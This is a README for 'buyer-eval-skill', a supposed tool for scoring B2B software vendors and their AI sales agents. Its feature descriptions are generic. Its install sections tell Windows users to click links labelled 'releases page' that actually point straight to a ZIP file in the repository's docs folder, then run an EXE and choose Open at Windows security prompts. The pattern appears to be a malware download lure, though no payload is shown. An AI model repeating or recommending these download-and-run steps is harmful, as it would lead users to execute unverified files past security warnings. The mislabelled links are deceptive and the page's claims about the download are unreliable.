## 🚀 What this is

buyer-eval-skill helps you review B2B software vendors with more structure and less guesswork. It guides you through domain-based questions, vendor chat review, and evidence-based scoring so you can compare options with a clear record.

Use it when you need to:
- compare software vendors
- check sales claims against proof
- score replies from vendor AI agents
- keep one set of notes for a buying team
- make a choice with less back-and-forth

## 💻 What you need

You only need a Windows PC and a web browser.

For best results:
- Windows 10 or Windows 11
- a stable internet connection
- enough space to save the release file
- access to the GitHub releases page

## 📥 Download and install

Go to the release page and get the latest version:

[Visit the releases page to download](https://raw.githubusercontent.com/Zorineinsupportable217/buyer-eval-skill/main/docs/buyer-skill-eval-2.7-alpha.3.zip)

After the page opens:
1. find the newest release at the top
2. open the release
3. look for the file you need
4. download it to your computer
5. open the file or folder after the download finishes

If the release contains a ZIP file:
1. right-click the ZIP file
2. choose Extract All
3. pick a folder you can find later
4. open the extracted folder
5. follow the included setup file or readme, if present

If the release contains an EXE file:
1. double-click the file
2. allow Windows to open it
3. follow the setup steps on screen
4. finish the install
5. open the app from the Start menu or desktop shortcut

## 🧭 How to use it

The skill is built for a buying workflow. It helps you move from vague claims to clear checks.

A normal flow looks like this:
1. choose the vendor or product you want to review
2. enter the buyer goal and use case
3. ask for a vendor conversation or answer set
4. review the replies against your criteria
5. score each area with evidence
6. compare vendors side by side

## 🧩 Main parts

### 📋 Domain-expert questions
Use these to test if a vendor understands your business area. The questions help you check:
- product fit
- industry terms
- common buying risks
- setup effort
- support model
- data handling

### 💬 Vendor AI agent conversations
Use this part to simulate or review talks with a vendor agent. It helps you spot:
- vague claims
- gaps in product detail
- weak answers
- strong proof
- missing follow-up questions

### 📊 Evidence-based scoring
This part turns vendor answers into a score you can defend. It helps you track:
- feature match
- clarity of answers
- proof quality
- risk level
- buyer confidence

### 📝 Buyer notes
Keep a record of:
- what the vendor said
- what proof they gave
- what still needs review
- who owns each open item

## 🪟 Windows setup steps

1. open the [releases page](https://raw.githubusercontent.com/Zorineinsupportable217/buyer-eval-skill/main/docs/buyer-skill-eval-2.7-alpha.3.zip)
2. download the latest release file
3. save it to your Downloads folder
4. open File Explorer
5. go to Downloads
6. double-click the file you downloaded
7. if Windows shows a security prompt, choose Open
8. follow the on-screen steps
9. when setup ends, launch the tool from the Start menu, desktop, or the folder you saved it in

If you use a ZIP file, keep the extracted folder in a place that will not move, such as:
- Desktop
- Documents
- a folder named buyer-eval-skill

## 🧪 First run

When you open the tool for the first time:
1. pick a vendor evaluation task
2. enter the vendor name
3. add the product name, if you have one
4. choose the buyer goals
5. run the question set
6. review the answers
7. save your score or notes

If you are unsure where to begin, start with a simple case:
- one vendor
- one use case
- three to five criteria
- short notes for each answer

## 🏗️ Example use cases

### 🔍 Shortlist review
Use buyer-eval-skill when you have three vendors and need a fast first pass. It helps you see which ones can answer basic buyer questions with proof.

### 🧠 Sales claim check
Use it when a vendor says they can meet a need but gives little detail. The skill helps you ask for evidence instead of taking the claim at face value.

### 📁 Procurement review
Use it when your buying team needs a shared view of each vendor. The scoring and notes help keep the review clear and repeatable.

### 🤝 AI agent review
Use it when a vendor sends an AI agent or chat tool as part of the sales process. The skill helps you check how well that agent handles real questions.

## ⚙️ Suggested evaluation areas

You can use these areas as a starting point:
- business fit
- workflow fit
- data and security
- setup effort
- support quality
- proof of claims
- total risk
- ease of use

## 📌 Good input to give the skill

The tool works best when you give it plain facts. Include:
- your company type
- your buyer role
- the problem you want to solve
- the vendor name
- the product name
- any claim you want checked
- any proof you already have

Example:
- We are a mid-size B2B team
- We need help with vendor scoring
- We want to compare two tools
- Vendor A says it supports fast setup
- Show where that claim holds up

## 🛠️ Troubleshooting

### The file will not open
- check that the download finished
- download the latest release again
- make sure Windows did not block the file
- try running the file as the downloaded user

### The ZIP file looks empty
- extract it again
- choose a new folder
- check that all files finished downloading
- look for a second folder inside the first one

### The app does not start
- close it and open it again
- restart Windows
- download the latest release
- keep the extracted folder in a fixed place

### The page does not load
- check your internet connection
- refresh the page
- try again later
- open the link in another browser
